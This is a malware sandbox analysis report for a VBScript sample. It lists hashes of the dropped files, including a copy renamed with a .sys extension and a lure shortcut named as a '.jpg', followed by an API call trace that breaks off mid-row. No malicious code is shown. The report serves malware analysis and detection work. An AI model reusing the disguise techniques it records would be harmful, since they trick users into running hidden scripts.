| Category | Started On | Completed On | Duration | Cuckoo Version |
|---|---|---|---|---|
| FILE | 2018-02-06 16:41:21 | 2018-02-06 16:51:36 | 615 seconds | 1.2 |

| Machine | Label | Manager | Started On | Shutdown On |
|---|---|---|---|---|
| WindowsXPSP3 | WindowsXPSP3 | VirtualBox | 2018-02-06 16:41:22 | 2018-02-06 16:51:35 |

| File name | dboardman3_malware2.vbs |
|---|---|
| File size | 9420 bytes |
| File type | ASCII text, with CRLF line terminators |
| CRC32 | A4A8B5E2 |
| MD5 | 9a1c48b9bfe5d642335bcbb983095994 |
| SHA1 | 78ee69c2d76ea773f4edbfea51518df455142348 |
| SHA256 | f74f124fd033ffc9c6a969ca1286b8a04c6255297852e0ad29ad2effadbbcbb4 |
| SHA512 | cc74950902f5d84c5ba4c40cee261ce86c96e34fe2c2b0c1cd5cfc2aef8e656d92083cae802fb476de8418cb8c0e9ad166940aec7b7239e6e20d3d6cab7140a3 |
| Ssdeep | 96:FKxvJMJPuSmLKMZkFVomNgFqTQo7p1JwtYny3zhzTnGbDxvx0soARhx62EA56SCT:MxvJmrNFV1NdkoQfRlAEI6h4F93Y |
| PEiD | None matched |
| Yara | None matched |
| VirusTotal | File not found on VirusTotal |

| File name | payload.txt |
|---|---|
| File size | 386 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | bbd12496c5a5225ba6425c5d105c95af |
| SHA1 | 8d51c2e9c8b6461d14b9ee5af3793d8fac392b77 |
| SHA256 | 30f79b2ec539fa89ec667ba1ad501d504e2c9b3bfc70e4dbeb9d4a0729233fdb |
| SHA512 | caf31481ac840b9298187a871b34ca7100b5b1428a715a1d640038424525e7edf9ed8670db5bced9d8bd90040f23db20bb420df4c1fa7e27ba5e0fa48ba804b5 |
| Ssdeep | 12:d/7SWPusFYVm6XmndTNTkK/EG8YKoFhzyX:dDYYWe/EGHd4 |
| Yara | None matched |
| VirusTotal | Search for Analysis |

| File name | backup_vabian.sys |
|---|---|
| File size | 9420 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | 9a1c48b9bfe5d642335bcbb983095994 |
| SHA1 | 78ee69c2d76ea773f4edbfea51518df455142348 |
| SHA256 | f74f124fd033ffc9c6a969ca1286b8a04c6255297852e0ad29ad2effadbbcbb4 |
| SHA512 | cc74950902f5d84c5ba4c40cee261ce86c96e34fe2c2b0c1cd5cfc2aef8e656d92083cae802fb476de8418cb8c0e9ad166940aec7b7239e6e20d3d6cab7140a3 |
| Ssdeep | 96:FKxvJMJPuSmLKMZkFVomNgFqTQo7p1JwtYny3zhzTnGbDxvx0soARhx62EA56SCT:MxvJmrNFV1NdkoQfRlAEI6h4F93Y |
| Yara | None matched |
| VirusTotal | Search for Analysis |

| File name | Sex-Vabian.jpg.lnk |
|---|---|
| File size | 1340 bytes |
| File type | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Icon number=0, Archive, ctime=Wed Feb 7 06:40:26 2018, mtime=Wed Feb 7 06:40:26 2018, atime=Wed Feb 7 05:38:31 2018, length=9420, window=showminimized |
| MD5 | 00ab8d610aa638b1f0d2603f96b58336 |
| SHA1 | ee84fc4c4d85247da9aac589ce0f8136904feb5e |
| SHA256 | cc2e50933e810a8978e4a6030fbc666e8e7bf591ea46cc3a0a348e744930cc02 |
| SHA512 | 1e98afb6b1a4afc7dce2073a099dcb439f3e064af1b2f9800100c70bab7a19fe3c76be97d4bd7232720e33f505770ef06c56a504df371ff5d85e389ff7cb1e2b |
| Ssdeep | 24:8r1vWlAevedfYP2fyL1/9/x4o00LOdoO4XZ+nGrjmrR:857MPvfWos1GrjmrR |
| Yara | None matched |
| VirusTotal | Search for Analysis |

| File name | desktop.ini |
|---|---|
| File size | 77 bytes |
| File type | ASCII text, with CRLF line terminators |
| MD5 | b125cfb7bd2483585e3b8eee09cee807 |
| SHA1 | 6edd39ea5deeb6739b2955f00c4a2ab281405b00 |
| SHA256 | 4a9eeb14c959fa61180a377d5441839b46fd130fcac3b03ba205e4e6e0cca941 |
| SHA512 | 053d654ec370298d7e542a41787ffed62851d1fb05c128977b0316288952f7112461dc9633e61a36bd0fd4479aaf7e1dcc0528cf9ceeb9ed90f9b632ab046319 |
| Ssdeep | 3:zOc1pLA9uXZECcYAGQECcrEI9hAl3:zz1aYJEHYAJEHQ6hAB |
| Yara | None matched |
| VirusTotal | Search for Analysis |

| Timestamp | Thread | Function | Arguments | Status | Return | Repeated |
|---|---|---|---|---|---|---|
| 19:40:26,253 | 252 | LdrLoadDll | Flags => 1309196 BaseAddress => 0x7c800000 FileName => kernel32.dll | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrGetProcedureAddress | Ordinal => 0 FunctionName => GetUserDefaultUILanguage FunctionAddress => 0x7c813100 ModuleHandle => 0x7c800000 | SUCCESS | 0x00000000 | |
| 19:40:26,253 | 252 | LdrGetDllHandle | ModuleHandle => 0x00000000 FileName => C:\WINDOWS\system32\rpcss.dll | FAILURE | 0xc0000135 | 1 time |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \x18 \xb1}<F\xe0\x97\xa0\xfb\xa6\xc5 s\xbbz\xcfi@\xb5\xd0 \x03\xff\x81v\xb3\\xefT\xe2p1\xf0\x1cgkF\xffx\xb2\x1e\x0e\xcc\x1cY\x01\xcdY<\xd4\xf2\xa7h\x89\xba9\xca\x19\x0fC\xb2\xb3\xaa\xb0\x99\x9d\xf12\x7fs\x82\xf7\xc5\xdcB\xb7\x93\xc6\xb2g~\x93=\xf8\xea\\x9cR\xd9\xd8\x81\xd3)\x14\xa4E<\xe6\xa7N\xe6\xb8\xa5[\xe6\xc5\x16E\x02\xc4\xfe\x1e\xab\x01\x8db =J6\x1c\x02x\xd2`\x175\x19C\xf0Z\xc5-\x0b\xf1h\xee\x89\xc5A\x91T~v\xdc\x85!P\x00WOx%\xd9\xfctOB3\x99\x03\x86\xda\xacp\xda\xd5dW\x8a\x905\x10\x14\x03\xf5D\xdd)\x85\xae\xb0\xca<[\xd9\xfc\x00`<\x19\xd9\xf6\x7f\xc8t\x01EB\xa0\xe2.eg\xbd\x13\x02\x0b/\xb7\xfa\xce\x056\x93"C\xc1\xf4C\xb5\x12\xad\xe7\xb6\x03\x8dh\xb0(\xb2\xa7\x0c\B\x1fo\x1et\xce\xfe*W\x15A\x9apv\x13 e;\xd8vw IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xb5\xcb\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \xf4\x06]UC\x80\xc4\xf5\xdf\xb5?(\x98\x91\xaf\x8d\x03\xd4n\xf8y\xdc/\x9f\xe2\x1a\x08\x05\x92\xc9\x8d\xfe\xfaGy\xb4Q\xf5\x15\x11\xf0\x0c\xf0j\xf3\x0f\x8dP\x89d"!\x10\x82zH\xa1\x12\xf2kA\xeb\xf2\xb8^I\xac3 \x96}a\x06fA2q\xe7t\x9e\x9f\xf4\x89\xb8\x8f\xb2?\xda\x0c\xf1S\xc2(, \x10\x8c3W;U\xbf\xe6\xee\xa25\xf5\xebR&\x0fH\xe66\x81O(H\xbb\xa8z\x8a\xef\x85\x9c\x10'\xf6QA\xf0\xe5h\xa59\x94\xce\xc9\xf6m\xb0\xd4\x03\xea\x01\xa7\x1b0}\x06-\x90\xfc\x86\xb5\xa23@\xa7\x93\x19\xb7o\xa8X\xfe#dS2\x97z\xa2\x98\x9e\xe1\xe3\xe6\x06U\x95\x8d\x98O`\x1c\xdb\|\xdd\xe5\xf8\xa5\x98\x03yt\xf0\xf9\xd9l\xbf\xf5\xc8u\x9b\x1c\xdf\xff\xb0\x9c\x03gi+\xd5\xc9\|v\xcb6\x02\xbb\xfe\xa9A\xab\x80\xbd\x04\xcc\x9e~1\x8e\xd8\xb4\x12*L\xf9o\x10\xd0\xacy\|>\xc5bT! \x8c\xfa\x194 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \x12\xb9\xdd7\xfef9\x14\xcd\xac_;\x0269\x9d}\x05y\x9c\xa8\x94]I\xac\xaeQH\xc5[;\xa6\x87\xa1\xa1\x95\xd9W\x08\xa6\x06Q<\xd71\x8f\x8by\xc1Sz\xb96J\x8b~\xb7\xf5\xff\x95\x14\xd9\x80\x83\xc6\xae\xa1k\x89\x08\x0cS\x8b\x82\x9e\x0b\x03YC\xb6\x1f\xa7\x1b8F\xfec\xad\x15\x81\xd8\xcd\xf1\x89 \xfb/v\x18%\x90\xb0\xda\x15~_\xc1\xa8\x0e\x00\xf2\x10\xbb\x15\x84\xb6\xd7\xfb \x8e\x97\xcbN\x99 g\xcd\xac\x92 &\x10\xfbu\xc8\xb0#\xdb\xff\xd6^\xf7\xc6\xb1e>X\x92\x9d\xc47\x01\x16u\xaf\xf1\x85\\xb3\x1b\xadt\xcb\xbd\x9f\xec%_ \xf3\xe8O\xaf+T\x98\x0cR\x13\xcf\xa3.\x80\xb81\xe0s\xd5\xe3\xb2+\xf4\x97\|H\xc1\xc4L\xf4r3Hf\x1f\xb3\x8c2\xfb\x8e\x88&(\xc6Yw\x8a\xcf\xa5 +\xf5~\xe5zW@> \xd7\x0e\xa0<\xed\xc0\xec \xf5Z\x94\xc6\xfceX\x08p\x89\xb9\x97\xcc+\x92\x1e\xc2-!H IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => ;\xfd\xd0`\xb3]\xbev\xb6oJ@<#'}\xa1\xc1\x16\xfc\x03\xac\x0c\x13\x83\x830}\xd6?\xc9V@\xba\xc45\x03\xd9\xd3\xa6\xbd\xef+*\x93\xcf\xf5]\xc6\xe593\xa7\x9f \xf9\xebc\xac\x8e~\x8b\xe9\xb3p\xbe_}\xc6\xf3\x04\xc9Ye9\xef^\xff\xb3#o\x82\xf6\x8b\x11\x84\x92\xc8\xfd\xed9\xdf.\x11a\x05V@\xf6$\xeb\x1d.\xf4\x02\x11\xef\xcd2N\x81#\x01V\xc5\x8f\x1f?\x19\x02\x1e\xd5\|\x109V\x08u\xa1\x0b\xb6?sYm\xae\xc8Z\xff\x94\xa6&\x01\xcd=zm\x89\xf7\x1d\x93\xa2J\xb4K\xc0\xc0\x83)\xc1\x12\x18\xc6\xdb\x96{\\xbe\x81\xa8nh\xd76\xc6\|\xeb\xa7F<\xed'W\xbaokY\xa6\xe0k+\x12\x9e\xa60\xcdG\x10\xd5}\xadR\x02&x\xedn/\xb8yP\xdf\x14\x1b}\x9a\\xd6\xb84'\x15\xeaO\xf7\x85\xb0\xe6\x90\xe7\xcd\xe0\xad\x8a\xcd\xfbJ\x19\xbb\x84$\xfe\x99\xcfx\x9c\xe6\xcb\xfea~\xdfz,0\xd4 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \x0b\xc7\x00\xb6\x10\x12\x15\xd4\xcb@\x9e\xba\xc2u\xeaUk\xb5sy\x92\x9e9\xad\xcf\|\xfa\xacg;\xa1tj\xb8a\xe20\xf1\xf2g\xef(z\xda\x08 \xfcIQ\xc0\xba\x08\xcd\x8f\xa6;y\x9f\xfb\xe4.\xdcP\x14\xe4\x0c\xd5\xac\xc6\|\xba\xc2Gmd+a\xf2\x97h\xf19\xbf\x87\x84}G\x89q9;0\x87&Z\xdd\x91\xc09hxF\xd5\xdd\xabL\x87\xd0\xb2\xca\|\xf2\x06d\xfd D\xcf\xe7\x14\x07\x9b\xac\x88\x83\x027&\xbd\xfd\x1b\xf0H\xa9\x9e\xc8\xe1H0\x10\x1a\x95\x9d\xc7q\x88$H\x9c\xe7\xa2\x08\xad$C\xec>\xbb\x8d\xf1\xb8\xb9LC\x13\x87l\xb7\xb6\x8f\xd0/\x14\xa74\x93\x1co\xf7\xe4J\xca\xf1\xd8`\xcb\x92\x8a\x02\x1c[N$b#5W\xacCr\xe6^`\xab\x05\xe2\x13\xdfW\x93\xca^\xf6+\xd4\xca\xc8[\x07\x03\xf8\x8b\x10PQ\xa2\x8a \x98Q;\xdc\xaa\xe7B\x0b\x9cXJ\xcf\x81\x11\xc1dr\x1d\xb5\xf6e\x1a\x98\x06\xe3TM\x86 IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \xcdV\xa6\x1fG?\xbb\xc6\x82A\xaf \x1d\xdeJ\x97Y#\xc3W\x05%\xf88K)\x86\x14\x7f\x05\xa7\xf1\xbdo?\x1c\xd5?'G\xc8\xac\xc7\x1e.\xca\x98md>yL\x9c\x05\xb8\xe4K>\x1eiD\x91\xe2fP\x990\xe5 \xb6\x86d0\x18#v \x02\xb7\x06\xf5\xa32\xc3\x14\x8d\x8c\x07q\xf4\x0f\xec\xf8\x0f\xa1\x9d\xfe\xfc \|\x02\xb7h9\xb8r\x1d\xa9#\xcfU8?\x0e\x15,\xb2\xd2)~\xdbG\xc8\x9d\xdc\xbe\x95P&e7\x08\x82}\xec\xeb\xd7\x8b\xb2\xb3\xa2\xb8\x98\xc5\xd1\xef\xa3\x8d\xb4 \xe9\xcb\xfdb\xe4\xbafl\xb5>\xe2f[%\xa1\xa68t\xfe\xc8\x947K\xbd\x91\x9e\x01\xb2_\x80\xf9\x85Z\x0f\x96\|\xb5\x08\x97Pb\xd5s\x19\x04)\xa3_>\xa5\xb7\x1b\x8d?h\x05\x98\x14s\xd3\xcd\x92\xdd\xf7Y\x02\x00\x84hBl\x0c\x80#oI\xc1s\x0e\x80\x8f\xa9\xed'\xb0\xa6@^."\xe3\x9c\x81_j\x02\x05\xcd\x16\xd2\xfc\xb1\xf9p IoControlCode => 3735560 InBuffer => \xed\xce\xa0/-\xbf\xd5\x16\x04\xf4\xf05r\xbe\xd7\x9c\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2}\x85\xfd+\x11\xb1\xc2\x1f\xd2\xc0h\x18\xb8t\xeeJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 | SUCCESS | 0x00000001 | |
| 19:40:26,253 | 252 | DeviceIoControl | DeviceHandle => 0x0000003c OutBuffer => \xefg\x0b\x153 \x93\xbd\x8e\xe0\xd2\x17\xfb\xc1\x00\x88\xcf,`\xe9O}H\x14\x0c\x9f\x87\x18j\x8d6B' \xcc03\x120\xb9\x13_j!\xac\x1d\xd7\x89Pu\xc1\xd2C\x04\xf0\xaa\x1a\xebXf\x12R\xd8\xda\x1b\xefc\x17\xdeD\x7f~f\xc7\xfd\xac\xda\x84\xd1\xa3\x96\x85'_>\xa2@\xe6 So\x9bP)\x08\xa0\x9dE\xacs\x97\xed\x9d\x939S\xee\xe1"\xb6\xa1\x1a\x00\x81G\x9en\xb2\x02e\xaa\xa8\x1b\x97E\x92\xbd[\x90 !\x1dr<\xaf\x19Y`'\x9f\xe0\xf3b\xf4,\xba(\xb3\xd7\xe0r\xbbt\xce*\xf1\x804\xe83\x1d\xbb\x87\x89\x93\x00\xe5f\x9b\xe71!Z\x82@\xe3r\xc7r\xc1\xbeS$\x96\xde\xd1\!\xa3\xa8\x9c%\x14\x865\xb8\xf8\xd3\xee`\xf2Lf\x96\x87\xf7M\xabttx\x96S\xec1\x83\x1b\x9cp6\x92\xf0\xde!W\x02\x1ff\x1ds\xfc\xb1\xdcQ\xda&'b\xa9\xf4v\xba\xc1j\xc8\xe3E\x89K\xf0,T\xfeq\xeeR IoControlCode => 3735560 InBuffer => 